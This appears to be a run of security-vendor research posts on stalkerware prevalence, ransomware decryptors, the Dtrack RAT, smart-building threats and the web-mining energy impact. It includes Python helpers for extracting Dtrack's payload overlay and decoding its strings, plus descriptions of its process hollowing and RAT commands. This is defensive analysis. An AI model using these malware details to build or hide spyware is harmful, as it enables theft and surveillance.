Despite all the convenient features the dropper’s author has built into it, we believe Hqwar (and similar wrappers) may soon lose much of their popularity: their counter-detection mechanisms have become obsolete, while the structure of the APK file implies there are places that cannot be “littered”, allowing for timely detection of threats (exactly what Kaspersky’s protective solutions are for).

2 October 2019

The State of Stalkerware in 2019

Introduction and methodology

Six months ago, we created a special alert that notifies users about commercial spyware (stalkerware) products installed on their phones. This report examines the use of stalkerware and the number of users affected by this software in the first eight months of 2019.

Consumer surveillance technology has evolved rapidly in recent years and the very purpose of surveillance activity has changed dramatically. The rise of the internet and subsequent explosion in mobile device usage has led to a thriving type of surveillance software – known as stalkerware. The software allows users to spy on other people – for example, to monitor their messages, call information and GPS locations – in complete stealth. It can often be used to abuse the privacy of current or former partners and even strangers. This can be done by simply manually installing an application on the targeted victim’s smartphone or tablet. Once in place, the stalker receives access to a range of personal data, despite being remote from the victim. It differs greatly from parental control software. While parental control apps aim to restrict access to risky and inappropriate content and persistently notify the user about their requests, stalkerware is about providing the abuser with surveillance to spy on a victim, without the consent of the individual.

The vast majority of stalkerware apps are not available on official app stores – like Google Play – and installation requires access to a dedicated website and access to the victim’s device. Those with bad intentions may use it to monitor employee emails, track children’s movements and even spy on what a partner is up to. Such uses may lead to harassment, surveillance without consent, stalking and even domestic violence. However, current laws to regulate the use of stalkerware are not yet strong enough to deter culprits from abusing and taking advantage of other people.

The data in this report has been taken from aggregated threat statistics obtained from the Kaspersky Security Network, to measure how often and how many users encountered stalkerware threats in the first eight months of 2019, compared to what was found last year. The Kaspersky Security Network is the infrastructure dedicated to processing cybersecurity-related data streams from millions of voluntary participants around the world. In this blog, we have explored why stalkerware is being used and where it is implemented most prolifically.

Main findings
  • From January to August 2019, around the world, there were more than 518,223 cases when our protection technologies either registered the presence of stalkerware on users’ devices or detected an attempt to install it – a 373% increase over the same period in 2018
  • In the first eight months of 2019, 37,532 users encountered stalkerware at least once. This is a 35% increase from the same period in 2018 when 27,798 users were targeted
  • The number of users targeted by full-throttle spyware detected as Trojan-Spy reached 26,620 in the first eight months of 2019, a minority compared to the number of users who encountered stalkerware
  • The Russian Federation remains the most prominent region for stalkerware globally, accounting for 25.6% of potentially affected users in the first eight months of 2019. India is in second place with 10.6% of affected users, and Brazil is in third place (10.4%). The United States holds fourth place with 7.1%
  • When it comes to Europe – Germany, Italy and the UK hold the top three places respectively
Rise of the stalkerware problem

This year has seen a sharp rise in the number of detections of stalkerware on Android devices protected by Kaspersky products. One reason for this rise could be the improvement in detecting stalkerware through cybersecurity solutions. In April, Kaspersky launched functionality in its Android security app – Privacy Alert – that specifically alerts users if software that can be used for stalking is found on their device. Since then, the number of detections has steadily risen. For instance, 4,315 users encountered stalkerware in March 2019, compared to 7,075 in April – a 64% increase in just one month. This figure rose to 9,251 during August, 94% higher than the month before the functionality was launched.

Fig.1 Number of users who encountered stalkerware in Jan-Aug 2019

These openly-sold consumer surveillance programs are often used for spying on colleagues, family members or partners, and are in great demand. For a relatively modest fee, sometimes as little as $7 per month, these apps stay hidden while keeping their operators informed about the device activity, such as its owner’s location, browser history, text messages, social media chats, and more. Some of them can even make video and voice recordings.

To further examine the extent of the stalkerware problem, Kaspersky has analyzed the last eight months’ worth of activity. Between January and August 2019, 37,533 users encountered stalkerware on their devices at least once. This is a 35% increase from the same period in 2018 when 27,798 users were targeted. Overall, there were 518,223 cases when Kaspersky products either registered the presence of stalkerware on users’ devices or detected an installation attempt in the period from January to August 2019 – a staggering 373% increase compared to the same period in 2018.

Fig.2 Users targeted by stalkerware 2018 vs 2019

Examples of software used for stalking purposes

The most prolific stalkerware family in 2019 was identified as Monitor.AndroidOS.MobileTracker.a, which affected 6,559 unique users. In second place, Monitor.AndroidOS.Cerberus.a was detected on the devices of 4,370 users, closely followed in third place by Monitor.AndroidOS.Nidb.a (4,047).

Comparing the results from 2018, the top two differ from last year. Monitor.AndroidOS.Nidb.a and Monitor.AndroidOS.PhoneSpy.b were found most on the devices of users in 2018, reaching 4,427 and 2,819 respectively. Monitor.AndroidOS.XoloSale.a was the third most common stalkerware reaching 1,946 users.

In our internal classification system, a Monitor.AndroidOS.MobileTracker.a record is used to identify a Mobile Tracker Free application, which is positioned as a tool to track the activity of children or employees. In fact, the application allows tracking of the user’s location, their correspondence both in SMS messages and messenger applications (WhatsApp, Hangouts, Skype, Facebook Messenger, Viber, Telegram, etc.), as well as calls. A third-party can also access victims’ photos from the phone and the camera in real-time, along with their browser history, files on the device, calendar and contact list. In addition, the application provides the ability to remotely control the device. As well as all of this, there is a possibility of working in a hidden mode under the disguise of system applications.

Fig.3 Screenshots from the Mobile Tracker Free official website

The next application – Cerberus (Monitor.AndroidOS.Cerberus.a) – is positioned as an anti-theft app. However, it also allows a stalker to work in ‘hidden’ mode and to prevent its deletion. Among other things, it provides the ability to track the location of the device, take pictures from the camera and screenshots, as well as record audio from the microphone.

The third-placed Monitor.AndroidOS.Nidb.a is in fact a group of similar applications: iSpyoo/TheTruthSpy/Copy9. Unlike the previous two applications, some representatives of this group openly advertise themselves as a means of spying on a partner and even write articles about it.

Fig.4 Screenshot from the TheTruthSpy official website

The set of functions is quite standard for such programs yet still impressive – website tracing, interception of correspondence in SMS and in messenger applications, call tracing and browser history. Like many other similar applications, they require super-user rights (administration rights) to operate some functions. They can work in ‘hidden’ mode, and their names in the list of installed applications mimic the system processes.

Where is stalkerware found?

There is a global market for legal spyware and stalkerware software, as proven by the diverse range of regions where the most attacks are taking place. The top 10 countries with the largest share of users attacked with stalkerware do not have geopolitical similarities and are not in close proximity.

Fig. 5 Geography of users who encountered stalkerware in 2019

Kaspersky’s findings show that Russia is the region where stalkerware activity is peaking. Persistent activity in India has led to the country being the second most prominent region for stalkerware-related incidents from January to August, with 10.56% of affected users.

Brazil accounted for 10.39% of attacked users in 2019, while the United States is now fourth (7.11%). There are advocacy groups in the country raising awareness about the dangers of stalkerware and conducting revealing user research. 72 domestic violence shelters were surveyed by National Public Radio, with 85% of domestic violence workers saying they have assisted victims whose abuser tracked them using GPS. Nearly three-quarters (71%) of domestic abusers monitor survivors’ computer activities, while 54% tracked survivors’ cell phones with stalkerware. The fifth most prevalent country in 2019 was Germany (3.55%).

Stalkerware on the cyberthreat landscape

When comparing stalkerware and spyware to the rest of the attacks mobile users face – such as adware, riskware and malware – it takes up a big share of less targeted not-a-virus programs. In the first eight months of 2019, Kaspersky detected 2,350,862 users attacked with potentially unwanted threats and just 1.60% of them were related to stalkerware. However, unlike the majority of mass potential threats (like adware), stalkerware requires a specific stalker to act and carry out its operation. Every target is being stalked and chosen on purpose. So, while the numbers are lower, stalkerware takes a more targeted effort to affect a victim and has a disturbing figure of abuse behind each of them.

To get the big picture when assessing stalkerware development dynamics, we’ve compared stalkerware to the full-scale illegal surveillance malware for PC that we detect as Trojan-Spy. The results show that while illegal spyware is in decline, stalkerware is thriving.

Fig. 6 Users attacked by stalkerware and spyware

Our analysis of the first eight months of 2019 shows that the number of users who encountered stalkerware had, in fact, surpassed the figure for Trojan-Spy attacks. While 2018 saw more than 43,000 spyware targets compared to around 28,000 stalkerware targets, in 2019 the picture changed. The number of users that encountered stalkerware grew by 35% to reach over 37,000, while spyware tools accounted for 26,620 of targets.

There has been a notable rise in the number of stalkerware-related incidents registered by Kaspersky products when compared to all threats from the figures in 2018. Between January and August last year, such software made up just 1.01% of the overall number of users who faced any kind of potentially dangerous (adware and others from not-a-virus category) software (2,740,023). It appears that stalkerware is growing in popularity, while more traditional malware attacks are less prolific than they were 12 months ago.

Conclusion and recommendations

It is clear to see that stalkerware is on the rise and becoming much more prominent in the cybersecurity landscape. In accordance with the overall number of detected riskware, adware and spyware attack fluctuations year-on-year, the percentage of stalkerware-related incidents continues to rise. It may take time to discover the role of stalkers on the cyberthreat landscape, but more incidents are now accounted for. Thanks to improved cybersecurity software, there has been a sharp rise since Kaspersky launched its own solution to notify users about stalkerware in April 2019.

There has also been a level of consistency around which countries are the most likely to experience stalkerware-related incidents, with Russia, India, the United States and Germany amongst the most prominent for the last two years.

The good news for users is that functionality and effective solutions are being put in place so they can protect themselves. Practical ways to solve the problem are coming to the fore. IT security companies and advocacy organizations working with domestic abuse victims should join forces to ensure that cybersecurity companies respond better to stalkerware. Such initiatives would help victims through technology and expertise.

We believe that every person has a right to be privacy-protected. That’s why we deliver security expertise, work closely with international organizations and law enforcement agencies to fight cybercriminals, as well as develop technologies, solutions and services that help you stay safe from the cyberthreats.

25 September 2019

Ransomware: two pieces of good news

“All your files have been encrypted.” How many times has this suddenly popped up on your screen? We hope never, because it’s one of the most common indicators that you’ve lost access to your files. And if there are no publicly available decryptors or you don’t have any backup copies, you’re in trouble.

Nowadays, cybercriminals have a thousand and one ways of creating and spreading ransomware. There are two common scenarios behind the creation of this kind of malware: in one, the criminals prefer to just reconfigure existing malicious source code; in the other, they choose to write their own ransomware, sometimes even using very specific languages.

However, don’t despair, because those fighting ransomware are not standing still either. In fact, we have two pieces of good news to share with you.

Good news #1

We’ve released a decryptor for the Yatron ransomware. The authors of the ransomware chose the first scenario mentioned above and based their ‘creation’ on the code used in Hidden Tear, a well-known sample of open-source ransomware. According to our statistics, during the last year alone our products have prevented more than 600 infections by various modifications of Trojan-Ransom.MSIL.Tear, with most attacks recorded in Germany, China, the Russian Federation, India and Myanmar.

Among the numerous modifications of Trojan-Ransom.MSIL.Tear, this one can be distinguished by the extension .Yatron that’s appended to encrypted files.

However, using third-party code without checking it raises the risk of critical vulnerabilities affecting the overall effectiveness of the program. That’s what happened here. Due to mistakes in the cryptographic scheme we were able to create a decryptor.

Good news #2

We’ve released a decryptor for the unique FortuneCrypt ransomware. To describe this malware, we could paraphrase Archimedes: give me a programming language, and I will write a ransomware program. The main feature of this ransomware is that it was compiled using a BlitzMax compiler. As Wikipedia states: “Being derived from BASIC, Blitz syntax was designed to be easy to pick up for beginners first learning to program. The languages are game-programming oriented but are often found general-purpose enough to be used for most types of application”. We’ve seen lots of ransomware written in C/C++, C#, Delphi, JS, Python, etc., but FortuneCrypt is the first ransomware we’ve seen that’s written in Blitz BASIC.

During the last year, our products registered more than 6,000 attacks carried out by the numerous variations of the malicious Trojan-Ransom.Win32.Crypren family (FortuneCrypt is part of this family). The top five countries attacked by the malware are: the Russian Federation, Brazil, Germany, South Korea and Iran.

The cryptor changes neither the file extension nor the file name; instead, it marks encrypted files by adding a text string to the beginning of an encrypted file.

The only indicator of infection visible to the victim is a ransom text that appears on the screen.

After some analysis, we found that the cryptographic scheme used by the malware is weak and the encrypted files can be easily recovered.


Both the decryptors mentioned here have been added to our RakhniDecryptor tool, which can be downloaded from the following sources:




Yatron ransomware

  • 7910B3F3A04644D12B8E656AA4934C59A4E3083A2A9C476BF752DC54192C255B


  • E2B9B48755BCA1EDFBA5140753E3AF83FB0AE724E36D8C83AB23E262196D1080
  • C26192E7B14991ED39D6586F8C88A86AF4467D5E296F75487BB62B920DEA533F
  • F2DCD2308C18FDB56A22B7DB44E60CDB9118043830E03DF02DAC34E4C4752587
23 September 2019

Hello! My name is Dtrack

Our investigation into the Dtrack RAT actually began with a different activity. In the late summer of 2018, we discovered ATMDtrack, a piece of banking malware targeting Indian banks. Further analysis showed that the malware was designed to be planted on the victim’s ATMs, where it could read and store the data of cards that were inserted into the machines. Naturally, we wanted to know more about that ATM malware, so we used YARA and Kaspersky Attribution Engine to uncover more interesting material: over 180 new malware samples of a spy tool that we now call Dtrack.

All the Dtrack samples we initially found were dropped samples, as the real payload was encrypted with various droppers—we were able to find them because of the unique sequences shared by ATMDtrack and the Dtrack memory dumps. After that, it got very interesting, because once we decrypted the final payload and used Kaspersky Attribution Engine again, we saw similarities with the DarkSeoul campaign, dating back to 2013 and attributed to the Lazarus group. It seems that they reused part of their old code to attack the financial sector and research centers in India. According to our telemetry, the last activity of DTrack was detected in the beginning of September 2019.

Technical details

The dropper has its encrypted payload embedded as an overlay of a PE file as extra data that will never be used in normal execution steps. Its decryption routine, part of an executable physical patch, begins somewhere between the start() and WinMain() functions. A fun fact is that the malware authors embedded their malicious code into a binary that was a harmless executable. In some cases, it was the default Visual Studio MFC project, but it could be any other program.

The decrypted overlay data contains the following artifacts:

  • an extra executable;
  • process hollowing shellcode;
  • a list of predefined executable names, which the malware uses as a future process name.
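Because the dropper keeps its payload as an overlay, the first triage step is to cut off everything past the last section's raw data and look at what remains. The extractor below is an added example for this post, not code from the original article or from Kaspersky: it walks the PE headers to find where the sections end and returns the trailing bytes. build_minimal_pe() assembles a constructed, non-runnable PE32 skeleton purely to exercise the extractor; it is not a Dtrack sample. One caveat a practitioner should keep in mind is built into the comments: Authenticode-signed binaries legitimately carry their signature past the sections, so a non-empty overlay is a lead, not a verdict.

```python
import struct

SECTION_HEADER_SIZE = 40


def extract_overlay(pe: bytes) -> bytes:
    """Return the bytes that follow the last section's raw data (the overlay).

    Raises ValueError if the buffer is not a PE image. Note that legitimately
    signed executables also carry data here (the Authenticode certificate
    table), so a non-empty overlay on its own is not evidence of anything.
    """
    if len(pe) < 0x40 or pe[:2] != b"MZ":
        raise ValueError("not an MZ/PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    num_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]       # COFF NumberOfSections
    size_opt = struct.unpack_from("<H", pe, e_lfanew + 20)[0]          # SizeOfOptionalHeader
    sec_table = e_lfanew + 4 + 20 + size_opt
    end_of_sections = 0
    for i in range(num_sections):
        off = sec_table + i * SECTION_HEADER_SIZE
        size_raw, ptr_raw = struct.unpack_from("<II", pe, off + 16)    # SizeOfRawData, PointerToRawData
        end_of_sections = max(end_of_sections, ptr_raw + size_raw)
    return pe[end_of_sections:]


def build_minimal_pe(section_data: bytes, overlay: bytes) -> bytes:
    """Constructed sample: one-section PE32 skeleton followed by `overlay` (test data only)."""
    e_lfanew = 0x40
    dos = b"MZ" + bytes(0x3A) + struct.pack("<I", e_lfanew)           # 64-byte DOS header
    # Machine i386, 1 section, no timestamp/symbols, 0xE0-byte optional header, EXECUTABLE|32BIT
    file_header = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x0102)
    opt_header = struct.pack("<H", 0x10B) + bytes(0xE0 - 2)          # PE32 magic, rest zeroed
    raw_ptr = 0x200
    section = b".text\0\0\0" + struct.pack("<IIIIIIHHI", len(section_data), 0x1000,
                                           len(section_data), raw_ptr, 0, 0, 0, 0, 0x60000020)
    header = dos + b"PE\0\0" + file_header + opt_header + section
    image = header + bytes(raw_ptr - len(header)) + section_data
    return image + overlay
```

On a real dropper the returned blob is the encrypted payload; its decryption routine, as the text notes, lives in the patched code between start() and WinMain() and has to be reversed separately.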

After decryption of the data, the process hollowing code is started, taking the name of the process to be hollowed as an argument. The name comes from the predefined list found within the decrypted overlay. All the names come from the %SYSTEM32% folder, as you can see in the decrypted file list below.

  • fontview.exe
  • dwwin.exe
  • wextract.exe
  • runonce.exe
  • grpconv.exe
  • msiexec.exe
  • rasautou.exe
  • rasphone.exe
  • extrac32.exe
  • mobsync.exe
  • verclsid.exe
  • ctfmon.exe
  • charmap.exe
  • write.exe
  • sethc.exe
  • control.exe
  • presentationhost.exe
  • napstat.exe
  • systray.exe
  • mstsc.exe
  • cleanmgr.exe

What is inside the dropper?

After execution, the target of the process hollowing is suspended until its memory is overwritten with the decrypted executable payload from the dropper overlay. After this, the target process resumes.

The droppers contain a variety of executables, all of these intended for spying on the victim. Below is an incomplete functionality list for the various Dtrack payload executables found:

  • keylogging,
  • retrieving browser history,
  • gathering host IP addresses, information about available networks and active connections,
  • listing all running processes,
  • listing all files on all available disk volumes.

At this point, the design philosophy of the framework becomes a bit unclear. Some of the executables pack the collected data into a password protected archive and save it to the disk, while others send the data to the C&C server directly.

Aside from the aforementioned executables, the droppers also contained a remote access Trojan (RAT). The RAT executable allows criminals to perform various operations on a host, such as uploading/downloading, executing files, etc. For a full list of operations, see the table below.

command id | description
--- | ---
1003 | upload a file to the victim’s computer
1005 | make target file persistent with auto execution on the victim’s host start
1006 | download a file from the victim’s computer
1007 | dump all disk volume data and upload it to a host controlled by criminals
1008 | dump a chosen disk volume and upload it to a host controlled by criminals
1011 | dump a chosen folder and upload it to a host controlled by criminals
1018 | set a new interval timeout value between new command checks
1023 | exit and remove the persistence and the binary itself
default | execute a process on the victim’s host

Dtrack and ATMDTrack malware similarities

ATMDTrack is a subset of the DTrack family. They naturally look different despite their similarities. For example, Dtrack’s payload is encrypted within a dropper—unlike the ATMDTrack samples, which were not encrypted at all. But after decrypting the Dtrack payload, it becomes clear that the developers are the same group of people: both projects have the same style and use the same implemented functions. The most obvious function they have in common is the string manipulation function. It checks if there is a CCS_ substring at the beginning of the parameter string, cuts it out and returns a modified one. Otherwise, it uses the first byte as an XOR argument and returns a decrypted string.

Functions common to the two families (the functions/arguments were named by the researchers)
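The shared string routine described above is the kind of thing an analyst reimplements first, because it turns the decoded strings into triage material (import names, paths, C2 hints) and doubles as a family-linking heuristic. The decoder below is an added example for this post, not code from the original article or from Kaspersky’s tooling, and it follows only what the text states: a leading CCS_ prefix is stripped and the rest returned as-is (the text says “modified”; the assumption here is that no further change is applied), otherwise the first byte is the XOR key for the remaining bytes. encode_for_sample() and the sample blobs are constructed for testing and are not strings from a Dtrack binary.

```python
PLAIN_PREFIX = b"CCS_"


def decode_dtrack_string(blob: bytes) -> bytes:
    """Decode one string the way the shared Dtrack/ATMDtrack routine is described.

    - Starts with "CCS_": cleartext, prefix removed (assumption: no other change).
    - Otherwise: byte 0 is the XOR key for bytes 1..n. A key byte of 0 therefore
      means the string was stored in the clear, which the decoder handles naturally.
    """
    if blob.startswith(PLAIN_PREFIX):
        return blob[len(PLAIN_PREFIX):]
    if not blob:
        return b""
    key = blob[0]
    return bytes(b ^ key for b in blob[1:])


def encode_for_sample(plain: bytes, key: int) -> bytes:
    """Constructed inverse used only to build test data: key byte first, then XORed payload."""
    return bytes([key]) + bytes(b ^ key for b in plain)


def is_printable_ascii(data: bytes) -> bool:
    return bool(data) and all(0x20 <= b < 0x7F for b in data)


def decode_candidates(blobs):
    """Decode a list of extracted blobs and keep only results that read as printable text.

    Returns [(original_blob, decoded)] so an analyst can map each string back to
    where it was found in the binary. Non-printable results are dropped as
    either non-strings or data that needs a different decoder.
    """
    out = []
    for blob in blobs:
        decoded = decode_dtrack_string(blob)
        if is_printable_ascii(decoded):
            out.append((blob, decoded))
    return out


# Constructed sample blobs: one cleartext entry, two XOR-encoded entries, one piece of junk.
SAMPLE_BLOBS = [
    b"CCS_kernel32.dll",
    encode_for_sample(b"cmd.exe /c", 0x5A),
    encode_for_sample(b"%SYSTEM32%\\ctfmon.exe", 0xA7),
    b"\x00\x01\x02\x03",
]
```

When several binaries decode cleanly with the same routine, that shared decoder is exactly the kind of code-level overlap the text describes between the ATM samples and the Dtrack payloads.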


When we first discovered ATMDtrack, we thought we were just looking at another ATM malware family, because we see new ATM malware families appearing on a regular basis. However, this case proved once again that it is important to write proper YARA rules and have a solid working attribution engine, because this way you can uncover connections with malware families that have appeared in the past. One of the most memorable examples of this was the WannaCry attribution case. Now we can add another family to the Lazarus group’s arsenal: ATMDtrack and Dtrack.

The vast amount of Dtrack samples that we were able to find shows that the Lazarus group is one of the most active APT groups in terms of malware development. They continue to develop malware at a fast pace and expand their operations. We first saw early samples of this malware family in 2013, when it hit Seoul. Now, six years later, we see them in India, attacking financial institutions and research centers. And once again, we see that this group uses similar tools to perform both financially-motivated and pure espionage attacks.

To succeed in spying, the criminals must be able to gain at least partial control over the internal network. This means that the target organizations may have a number of security issues, such as:

  • weak network security policies,
  • weak password policies,
  • lack of traffic monitoring.

We therefore advise the companies to:

  • tighten their network and password policies,
  • use traffic monitoring software, such as Kaspersky Anti Targeted Attack Platform (KATA),
  • use antivirus solutions.

Indicators of compromise (MD5)

  • 8f360227e7ee415ff509c2e443370e56
  • 3a3bad366916aa3198fd1f76f3c29f24
  • F84de0a584ae7e02fb0ffe679f96db8d

19 September 2019

Threat landscape for smart buildings

The Kaspersky Industrial Cybersecurity Conference 2019 takes place this week in Sochi, the seventh such conference dedicated to the problems of industrial cybersecurity. Among other things, the conference will address the security of automation systems in buildings — industrial versions of the now common smart home. Typically, such a system consists of various sensors and controllers to manage elevators, ventilation, heating, lighting, electricity, water supply, video surveillance, alarm systems, fire extinguishing systems, etc.; it also includes servers that manage the controllers, as well as computers of engineers and dispatchers. Such automation systems are used not only in office and residential buildings, but in hospitals, shopping malls, prisons, industrial production, public transport, and other places where large work and/or living areas need to be controlled.

We decided to study the live threats to building-based automation systems and to see what malware their owners encountered in the first six months of 2019.

Malware and target systems

According to KSN, in H1 2019 Kaspersky products blocked malicious objects on 37.8% of computers in building-based automation systems (from a random sample of more than 40,000 sources).


Share of smart building systems on which malware was blocked, 2018-2019

It should be mentioned right away that most of the blocked threats are neither targeted, nor specific to building-based automation systems. In other words, it is ordinary malware regularly found on corporate networks unrelated to automation systems. This does not mean, however, that such malware can be ignored — it has numerous side effects that can have a significant impact on the availability and integrity of automation systems, from file encryption (including databases) to denial of service on network equipment and workstations as a result of malicious traffic and unstable exploits. Spyware and backdoors (botnet agents) pose a far greater threat, since stolen authentication data and the remote control it provides can be used to plan and carry out a targeted attack on a building’s automation system.

What are the threats of a targeted attack? First off, there is disruption of the computers that control the automation systems, and subsequent failure of the systems themselves, since not all of them are totally autonomous. The result may be a disruption of the normal operation of the building: electricity, water, and ventilation are likely to continue to work as before, but there may be problems with opening/closing doors or using elevators. There may also be problems with the fire extinguishing system, for example, a false alarm or, worse, no signal in the event of a fire.

Geographical distribution of threats

Share of smart building systems on which malware was blocked, by country, H1 2019

Top 10 countries

Country           %*
Italy             48.5
Spain             47.6
Britain           44.4
Czech Republic    42.1
Romania           41.7
Belgium           38.5
Switzerland       36.8
India             36.8
China             36.0
Brazil            33.3

*Share of computers on which malware was blocked

Sources of threats to building-based automation systems

When studying the sources of threats to building-based automation systems, we decided to compare them with similar statistics on industrial systems that we regularly compile and publish. Here’s the result:


Sources of threats to building-based automation systems by share of attacked computers, H1 2019

The graph shows that for each threat source, the share of attacked computers in building-based automation systems is consistently higher than in industrial systems. Even so, the total share of attacked computers over the same period is greater in industrial systems (41.2%). This is because building-based automation systems are more similar to systems in the IT segment: on the one hand, they are better protected than industrial ones, so the overall percentage is lower; on the other, they have a larger attack surface (i.e. the majority have access to the Internet and often use corporate mail and removable drives), so each computer is exposed to more threats from different sources.


Types of malware detected in building-based automation systems, by share of users attacked, H1 2019

Note that it is not only the networks of automation systems in specific buildings (stations, airports, hospitals, etc.) that face threats. The networks of developers, integrators, and operators of such systems, who have (often privileged) remote access to a huge number and variety of objects, are also subjected to “random” and targeted attacks. Having gained access to computers in the network of an integrator or dispatcher, the cybercriminals can, theoretically, attack many remote objects simultaneously. At the same time, the remote connection to the automation object on the side of the integrator/operator is considered trusted and often effectively uncontrolled.

The threat landscape for smart buildings and how to minimize it will be discussed in more detail at the conference. One final note is to mention the importance of monitoring network communications on the perimeter and inside the network of automation systems. Even minimal monitoring will reveal current issues and violations, the elimination of which will significantly increase the object’s level of security.

17 September 2019

Assessing the impact of protection from web miners

Brief summary:

We present the results of evaluating the positive economic and environmental impact of blocking web miners with Kaspersky products. The total power saving can be calculated with known accuracy using the formula <w>·N, where <w> is the average value of the increase in power consumption of the user device during web mining, and N is the number of blocked attempts according to Kaspersky Security Network (KSN) data for 2018. This figure is equal to 18.8±11.8 gigawatts (GW), which is twice the average power consumption rate of all Bitcoin miners in that same year. To assess the amount of saved energy based on this power consumption rate, this number is multiplied by the average time that user devices spend on web mining, that is, according to the formula <w>·N·t, where t is the average time that web miners would have been working had they not been blocked by our products. Since this value cannot be obtained from Kaspersky data, we used information from open sources provided by third-party researchers, according to which the estimated amount of electricity saved by users of our products ranges from 240 to 1,670 megawatt hours (MWh). Using the average prices for individual consumers, this amount of electricity could cost up to 200 thousand dollars for residents in North America or up to 250 thousand euros for residents in Europe.

So what’s our contribution to the fight against excess energy consumption?

Cryptocurrency mining is an energy-intensive business. According to some estimates, Bitcoin miners consume the same amount of energy as the Czech Republic, a country of more than 10 million people (around 67 terawatt hours per year). At the same time, as we already noted, they do this with multiple redundancy — but only as long as this is economically justified. But what about users that are forced to mine against their will — that is, systems affected by web miners (websites mining cryptocurrency)? Since this most often happens illicitly, such sites are detected by security solutions as malicious and blocked.

In 2018, Kaspersky products blocked 470 million attempts to download scripts and attempts to connect to mining resources on the computers and devices participating in Kaspersky Security Network. Is it possible to assess the economic (and environmental) impact of this undoubtedly positive activity? To answer this question, we had to tackle several issues.

1. How much does power consumption increase when the system is mining cryptocurrency?

We couldn’t find any open source data on this matter, since most researchers are interested in, so to speak, the integral power consumption of cryptocurrency mining systems, that is, how much a particular hardware setup consumes in total and how much its owner would spend to cover the electricity bill. Data on the most common mining systems can be found on sites like miningbenchmark.net, which help in making an informed decision on economic viability and, accordingly, whether to mine or not to mine. We were interested in a different question: what portion of a system’s total energy consumption is related specifically to web mining that happens without the user’s consent.

To get an answer, we used a measuring bench previously set up to study surges in mobile energy consumption during USB charging and data exchange.

Using the computers of 18 volunteers (a big thank-you to them once again), we were able to experimentally determine the rise in the power consumption of 21 different devices when mining Monero on CoinHive (the most common cryptocurrency mining service). In brief, here’s what we managed to figure out:

  • Is there a dependence on the type of processor? Definitely.
  • Is there a dependence on the amount and type of memory? Definitely not.

This is clear from this image showing the increase in CPU load when mining begins:

As can be seen, the amount of memory used does not change and does not depend on the processor load.

  • Is there a dependence on Internet connection speed? We did not check this; in all experiments the connection speed was more or less the same.
  • Is there a dependence on the browser? Definitely not.
  • Is there a dependence on the type of operating system? Probably not.

It’s worth explaining here that we lack sufficient data to draw a definite conclusion regarding the operating system. We saw slightly different results for the same hardware running under different operating systems (namely, Mac OS and Windows); the difference falls within the boundaries of statistical error, and there are too few points for a reliable conclusion.

For comparison, the processor load under Mac OS looked something like this:

The situation is identical to the CPU load under Windows, not exceeding 10–12% in idle mode, and 100% during web mining.

The graph showing the dependence of the measured increase in energy consumption on the processors’ nominal TDP (thermally dissipated power), taken from the manual, looks something like this:

The red line shows the result of a linear approximation of the form ax + b, where a = 1.013±0.017 and b = –0.237±0.044 (determined by the least squares method, taking into account the measurement error at each point), together with the range of values predicted by the model with 95% probability. There are slightly more outliers on this graph towards energy consumption exceeding TDP than towards energy consumption below it. Overall, however, for the purposes of further approximation, it is sufficient to use TDP as an estimate of the increase in energy consumption in web mining mode.

2. But processors that are part of devices that block web miners have different TDPs. How do we evaluate the contribution of each of them?

To analyze the distribution pattern of processors by TDP, we used a random sample containing about 1% of the total number of devices participating in KSN. In this sample, we managed to identify 2,497 CPU types. Reference data on 1,550 types of processors were pulled automatically by playing with regular expressions and scraping open sources, the most useful of which was PassMark CPU Benchmark. Information about the remaining 947 types of processors had to be added manually.

The weighted average TDP from this data was calculated as

where f_i is the frequency of the i-th type of processor, and n_i is the number of processors of the i-th type in the distribution of CPU TDPs. However, the frequency distribution of CPU TDPs is far from normal, so we have to use a coarse estimate covering all TDP values from 15 to 65 W, that is, <w> = 40±25 W.

3. How to calculate the average working time of a web miner?

This is perhaps the most difficult question, since Kaspersky products are there to block web miners. A study by our colleagues from the Foundation for Research and Technology — Hellas (FORTH), a research center in Greece, gives an estimate of the average working time of web miners at 5.3 minutes. And a joint report by colleagues from the University of California, Santa Barbara, the University of Amsterdam, and the University of Utrecht estimates the average time that people spend on websites where web mining activity has been detected as approximately one minute.

At the time of writing this article, web analytics service SimilarWeb had calculated the average time of a visit to cnhv.co (a coinhive.com mirror) to be 46 seconds. As such, time is the most volatile parameter in our energy consumption formula Wtotal = <w>·N·t, where N is the number of detections and t is the time that the web miner would have been in operation had it not been blocked by our product. Substituting the corresponding values, we obtain an estimate of Wtotal: 240 to 1,670 megawatt hours (MWh). Being several orders of magnitude less than Bitcoin’s total energy consumption of 67 terawatt hours, this is still a serious amount of energy. It is comparable to the annual energy consumption of a city with a population of several hundred thousand.

Incidentally, the cost of the maximum amount of power that the miners we blocked could have consumed (1.67 GWh) varies around the world. If this amount of power were consumed entirely in Europe, European consumers would have to fork out €250,000, while for US residents the figure would be $200,000. The cheapest electricity of all would be available to residents of China and India, where negligence in the face of web miners would cost “only” $133,000. And in Japan, where electricity is the most expensive, that would cost half a million dollars.

As for the ecological impact, based on the IEA (International Energy Agency) global average value for carbon emissions of 475 kg/MWh, we can assume that we have prevented the release of 115 to 800 tons of CO2 into the atmosphere.

As you can see, the confidence intervals that we have for the energy estimates are quite wide. This is because we had to use the working time, which we could not estimate directly. If we remove it from the equation, we get the “detection power” (<w>·N), or the power consumption rate of all blocked attempts. For the 470 million web mining attempts detected (and blocked) in 2018, this value is equal to 18.8±11.8 gigawatts (GW). To compare that with Bitcoin as a reference point, we can divide the known amount of energy Bitcoin miners consumed in the same year by time, which gives roughly 7.647 GW, that is, half as much! Remember that the total energy consumed by Bitcoin miners was compared with the electricity used by residents of the Czech Republic? Looking into the IEA’s statistics for OECD countries, we found that a power consumption rate of 18.8 GW is comparable to the power consumption rate (the amount of energy consumed per unit of time) of a country such as Poland, with almost three times as many residents as the Czech Republic. We can also compare this with the infamous Chernobyl nuclear plant, whose four reactors before the accident produced around 4 GW of power in total. In other words, in one year Kaspersky products saved as much power as the output of four Chernobyl plants, or double the power consumption rate of all Bitcoin miners worldwide.
